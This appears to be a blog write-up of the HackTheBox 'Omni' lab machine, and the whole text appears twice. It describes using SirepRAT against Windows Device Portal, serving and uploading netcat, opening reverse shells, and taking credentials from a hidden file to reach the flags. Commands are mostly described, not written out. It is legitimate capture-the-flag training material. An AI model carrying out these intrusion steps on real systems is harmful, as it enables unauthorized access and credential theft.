HackTheBox:Omni(Windows)
Let’s start our box with an nmap scan
From our nmap scan we get to know that this machine has Windows Device Portal .When we visit the port 8080, we find its a login page but we don’t have credentials.
When we search for Windows Device Portal it leads us to Sireprat .We can test if it works by using simple commands like ipconfig.
Since this works we can do a simple thing ,which is to upload netcat binary in a windows writeable folder. We need to make sure that on our machine we used python3 -m http.server 80 ,to host the netcat file in a local web server.
After the transfer we can use this binary to connect to our machine but we need to make sure we are using netcat listener on our machine.
We got this initial shell as omni user but this shell isn’t that useful for us , although enumerating this we found that the Users directory doesn’t have other users.
Athough there are other users present.
When we enumerate further we find there are other directories present among which U:\ has the users and their flags which we can’t access as of now because they are for other users.
This file is a hidden file in C:\Program Files\WindowsPowerShell\Modules\PAckageManagement .We got credentials for two users now we go back to the login page we have on port 8080 and login as these users to get flags. So first we login as app user.
After we login there is an option of writing the command ,which we will use to get a reverse shell, since we already uploaded netcat we can use the same to get a reverse shell. We need to make sure our machine has a netcat listener.
We get the shell and after that we can get the user flag. But that’s encrypted so we need to decrypt it to see the flag.
Next part is getting the root flag which we can get by repeating the same steps we used for app user, but we need to logout or use an incognito window for the same.
After running the command we get the reverse shell but make sure the netcat listener is working.
Happy Hacking!!!!
Let’s start our box with an nmap scan
From our nmap scan we get to know that this machine has Windows Device Portal .When we visit the port 8080, we find its a login page but we don’t have credentials.
When we search for Windows Device Portal it leads us to Sireprat .We can test if it works by using simple commands like ipconfig.
Since this works we can do a simple thing ,which is to upload netcat binary in a windows writeable folder. We need to make sure that on our machine we used python3 -m http.server 80 ,to host the netcat file in a local web server.
After the transfer we can use this binary to connect to our machine but we need to make sure we are using netcat listener on our machine.
We got this initial shell as omni user but this shell isn’t that useful for us , although enumerating this we found that the Users directory doesn’t have other users.
Athough there are other users present.
When we enumerate further we find there are other directories present among which U:\ has the users and their flags which we can’t access as of now because they are for other users.
This file is a hidden file in C:\Program Files\WindowsPowerShell\Modules\PAckageManagement .We got credentials for two users now we go back to the login page we have on port 8080 and login as these users to get flags. So first we login as app user.
After we login there is an option of writing the command ,which we will use to get a reverse shell, since we already uploaded netcat we can use the same to get a reverse shell. We need to make sure our machine has a netcat listener.
We get the shell and after that we can get the user flag. But that’s encrypted so we need to decrypt it to see the flag.
Next part is getting the root flag which we can get by repeating the same steps we used for app user, but we need to logout or use an incognito window for the same.
After running the command we get the reverse shell but make sure the netcat listener is working.
Happy Hacking!!!!
Comments
Post a Comment